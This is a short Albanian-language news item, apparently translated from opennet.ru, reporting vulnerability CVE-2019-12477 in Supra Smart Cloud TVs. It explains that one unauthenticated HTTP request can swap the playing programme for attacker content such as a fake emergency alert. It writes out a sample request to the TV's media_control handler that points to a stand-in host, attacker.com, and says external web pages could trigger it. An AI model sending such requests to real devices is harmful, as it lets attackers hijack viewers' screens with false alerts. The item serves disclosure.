Në televizorët Supra Smart Cloud dobësi (CVE-2019-12477) që ju lejon të zëvendësoni programin e parë aktualisht me përmbajtjen e sulmuesit. Si shembull, tregohet rezultati i një paralajmërimi fiktiv për një situatë emergjente.
Për një sulm, mjafton të dërgoni një kërkesë rrjeti të krijuar posaçërisht që nuk kërkon vërtetim. Në veçanti, mund të hyni në mbajtësin "/remote/media_control?action=setUri&uri=" duke specifikuar URL-në e skedarit m3u8 me parametrat e videos, për shembull "http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.”
Në shumicën e rasteve, qasja në adresën IP të televizorit është e kufizuar në rrjetin e brendshëm, por meqenëse kërkesa dërgohet përmes HTTP, është e mundur të përdoren metoda për të hyrë në burimet e brendshme kur përdoruesi hap një faqe të jashtme të krijuar posaçërisht (për shembull, nën maskën e një kërkese fotografie ose duke përdorur ).
Burimi: opennet.ru
